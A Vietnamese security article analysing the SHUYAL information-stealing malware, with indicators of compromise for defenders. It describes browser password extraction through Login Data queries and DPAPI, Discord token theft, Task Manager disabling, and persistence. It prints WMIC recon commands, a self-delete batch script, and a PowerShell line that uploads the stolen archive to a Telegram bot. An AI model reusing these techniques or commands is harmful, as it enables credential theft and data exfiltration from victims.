Một biến thể **mã độc SHUYAL** đánh cắp thông tin tinh vi mới đã được Hybrid Analysis phát hiện gần đây. Tên của mã độc này được đặt theo các định danh duy nhất trong đường dẫn PDB của tệp thực thi, vốn cũng tham chiếu đến một tên người dùng “sheepy”. SHUYAL đại diện cho một **mối đe dọa mạng** chưa từng được ghi nhận trước đây, kết hợp khả năng nhắm mục tiêu trình duyệt toàn diện với việc thăm dò hệ thống nâng cao.
Khả Năng Đánh Cắp Thông Tin Từ Trình Duyệt Rộng Khắp
Mã độc SHUYAL đã thể hiện khả năng vượt trội trong việc trích xuất thông tin xác thực từ 19 trình duyệt web khác nhau. Điều này bao gồm các trình duyệt phổ biến và chuyên dụng, đảm bảo phạm vi tấn công rộng lớn.
Danh Sách Các Trình Duyệt Bị Nhắm Mục Tiêu
- Google Chrome
- Microsoft Edge
- Opera
- Brave
- Yandex
- Opera GX
- Vivaldi
- Chromium
- Waterfox
- Tor
- Epic Privacy Browser
- Comodo Dragon
- Slimjet
- Coc Coc
- Maxthon
- 360 Secure Browser
- UR Browser
- Avast Secure Browser
- Falkon
Thực Hiện Thăm Dò Hệ Thống Chuyên Sâu
Ngoài khả năng đánh cắp thông tin trình duyệt, **mã độc SHUYAL** còn thực hiện việc liệt kê chi tiết các thành phần phần cứng. Điều này giúp mã độc thu thập thông tin cấu hình hệ thống nạn nhân.
Thu Thập Thông Tin Phần Cứng Qua WMIC
Mã độc truy xuất các mô hình và số sê-ri của ổ đĩa cứng bằng cách sử dụng các lệnh WMIC. Nó cũng thu thập mô tả và ID thiết bị cho bàn phím, thiết bị trỏ như chuột và màn hình máy tính để bàn. Điều này cung cấp một bức tranh toàn diện về môi trường phần cứng.
wmic diskdrive get model, serialnumber
wmic keyboard get description, deviceid
wmic pointingdevice get description, deviceid
wmic desktopmonitor get description, deviceidTruy Vấn Đường Dẫn Hình Nền Desktop
Hoạt động thăm dò này còn mở rộng đến việc truy vấn đường dẫn hình nền máy tính bằng PowerShell. Mặc dù các lệnh chưa hoàn chỉnh như “wmic get name” không mang lại dữ liệu có thể hành động, nó cho thấy nỗ lực của mã độc trong việc thu thập thông tin chi tiết về môi trường người dùng.
Thu Thập Dữ Liệu Nhạy Cảm và Token Discord
SHUYAL không chỉ tập trung vào trình duyệt mà còn mở rộng phạm vi thu thập dữ liệu sang các khu vực nhạy cảm khác trên hệ thống.
Chụp Màn Hình và Đánh Cắp Nội Dung Clipboard
Mã độc sử dụng các API GDI+ như GdiplusStartup, BitBlt và GdipSaveImageToFile để chụp màn hình, lưu chúng dưới dạng “ss.png”. Ngoài ra, nó trích xuất nội dung clipboard thông qua OpenClipboard và GetClipboardData, lưu trữ chúng trong tệp “clipboard.txt”.
Đánh Cắp Token Ứng Dụng Discord
Mã độc SHUYAL tiếp tục nhắm mục tiêu vào các ứng dụng Discord tiêu chuẩn, Canary và PTB để đánh cắp các token xác thực. Những token này được ghi lại cùng với dữ liệu trình duyệt trong các tệp như “tokens.txt” và “debug_log.txt” bên trong thư mục tạm thời “runtime”.
Chiến Thuật Né Tránh và Duy Trì Ổn Định
Sự tinh vi trong hoạt động của mã độc SHUYAL thể hiện rõ qua các chiến thuật né tránh của nó, bao gồm việc chủ động vô hiệu hóa các công cụ giám sát hệ thống và thiết lập cơ chế bền bỉ.
Vô Hiệu Hóa Windows Task Manager
SHUYAL thực hiện việc chấm dứt quy trình Windows Task Manager một cách mạnh mẽ thông qua các lệnh gọi TerminateProcess. Sau đó, nó vô hiệu hóa hoàn toàn Task Manager bằng cách đặt khóa registry “DisableTaskMgr” thành 1 trong HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System. Điều này ngăn người dùng theo dõi hoặc gián đoạn các hoạt động của mã độc.
Cơ Chế Khởi Động Tự Động (Persistence)
Để duy trì sự tồn tại, mã độc SHUYAL tận dụng API SHGetSpecialFolderPathA để định vị thư mục Khởi động (Startup folder) của người dùng (CSIDL_STARTUP). Sau đó, nó tự sao chép vào thư mục này bằng CopyFileA, đảm bảo tự động thực thi khi hệ thống khởi động. Cơ chế này giúp mã độc duy trì sự hiện diện trên hệ thống ngay cả sau khi khởi động lại.
Kỹ Thuật Đánh Cắp Thông Tin Đăng Nhập Chuyên Sâu Gây **Rò Rỉ Dữ Liệu**
Việc đánh cắp thông tin xác thực được thực hiện một cách tỉ mỉ. **Mã độc SHUYAL** xác định vị trí các cơ sở dữ liệu “Login Data” từ các trình duyệt mục tiêu, sao chép chúng vào thư mục hiện hành (ví dụ: “chrome_Data.db” cho Chrome).
Quy Trình Trích Xuất Mật Khẩu
Mã độc chạy các truy vấn SQL như SELECT origin_url, username_value, password_value FROM logins để trích xuất thông tin xác thực. Mật khẩu được giải mã bằng khóa chính của trình duyệt từ tệp “Local State”, sau đó được xử lý qua DPAPI’s CryptUnprotectData sau khi giải mã Base64, và lưu trong “saved_passwords.txt”.
Đánh Cắp Lịch Sử Duyệt Web
Lịch sử duyệt web cũng bị đánh cắp tương tự từ các tệp như “\User Data\Default\History” và được lưu trữ dưới dạng “history.txt”. Điều này thể hiện một cách tiếp cận kỹ lưỡng trong việc tổng hợp dữ liệu, tăng mức độ nghiêm trọng của **rò rỉ dữ liệu** cá nhân.
Phương Thức Tẩu Tán Dữ Liệu và Giao Tiếp C2
Để duy trì sự bí mật, **mã độc SHUYAL** sử dụng các phương pháp tẩu tán dữ liệu hiện đại, đảm bảo thông tin đánh cắp được gửi đi một cách hiệu quả và khó bị phát hiện.
Truyền Tải Dữ Liệu Nén Qua Telegram Bot
Mã độc nén thư mục “runtime” thành “runtime.zip” thông qua cmdlet Compress-Archive của PowerShell và truyền tải đến một bot Telegram. Điều này kết hợp việc đánh cắp token Discord với chuyển tiếp dữ liệu qua Telegram, đảm bảo giao tiếp lệnh và điều khiển (C2) hiệu quả.
Compress-Archive -Path "runtime" -DestinationPath "runtime.zip"
Invoke-WebRequest -Uri "hxxps://api.telegram[.]org/bot7522684505:AAEODeii83B_nlpLi0bUQTnOtVdjc8yHfjD/sendDocument?chat_id=-1002503889864" -Method Post -InFile "runtime.zip"Giám Sát Sự Kiện Mạng
Các sự kiện mạng được giám sát bằng WSAEnumNetworkEvents để phát hiện dựa trên socket, bổ sung một lớp nhận thức hoạt động khác cho mã độc.
Biện Pháp Chống Pháp Y Số
Sau khi tẩu tán dữ liệu, **mã độc SHUYAL** xóa các dấu vết bằng cách loại bỏ các bản sao cơ sở dữ liệu và tệp thời gian chạy đã tạo, nâng cao khả năng chống phân tích pháp y của nó.
Xóa Dấu Vết và Tự Hủy
Cuối cùng, việc tự xóa được thực hiện thông qua một tập lệnh batch “util.bat”. Tập lệnh này sử dụng các lệnh như timeout /t 1 /nobreak >nul và del /f /q để xóa chính tệp thực thi sau một độ trễ, để lại dấu chân tối thiểu.
timeout /t 1 /nobreak >nul
del /f /q "[path_to_shuyal_executable].exe"Chỉ Số Thỏa Hiệp (Indicators of Compromise – IOCs)
Các tổ chức nên theo dõi các chỉ số sau để phát hiện và ngăn chặn sự lây nhiễm **mã độc SHUYAL**:
- C2 Server URL:
hxxps://api.telegram[.]org/bot7522684505:AAEODeii83B_nlpLi0bUQTnOtVdjc8yHfjD/sendDocument?chat_id=-1002503889864 - Tên tệp tạm thời: ss.png, clipboard.txt, tokens.txt, debug_log.txt, runtime.zip, util.bat
- Tên tệp cơ sở dữ liệu sao chép: chrome_Data.db (và tương tự cho các trình duyệt khác)
- Khóa Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr(giá trị 1)
Tác Động và Khuyến Nghị An Ninh Mạng
Cuộc kiểm tra chuyên sâu này, kết hợp các chỉ số hành vi của Hybrid Analysis với phân tích tĩnh và động, nhấn mạnh vai trò của **mã độc SHUYAL** như một công cụ đánh cắp thông tin đa năng. Nó không chỉ đánh cắp thông tin xác thực mà còn tiến hành thăm dò hệ thống, né tránh phát hiện và tẩu tán dữ liệu một cách lén lút, gây ra rủi ro đáng kể cho người dùng trên các hệ sinh thái trình duyệt đa dạng.
Các nhóm **an ninh mạng** được khuyến nghị theo dõi các mẫu hành vi này, tận dụng quyền truy cập vào Hybrid Analysis để tải xuống mẫu và thực hiện kỹ thuật đảo ngược sâu hơn nhằm phát triển các biện pháp phòng thủ mạnh mẽ chống lại các mối đe dọa như vậy. Để biết thêm chi tiết kỹ thuật về SHUYAL, tham khảo báo cáo của Hybrid Analysis tại Hybrid Analysis Report.
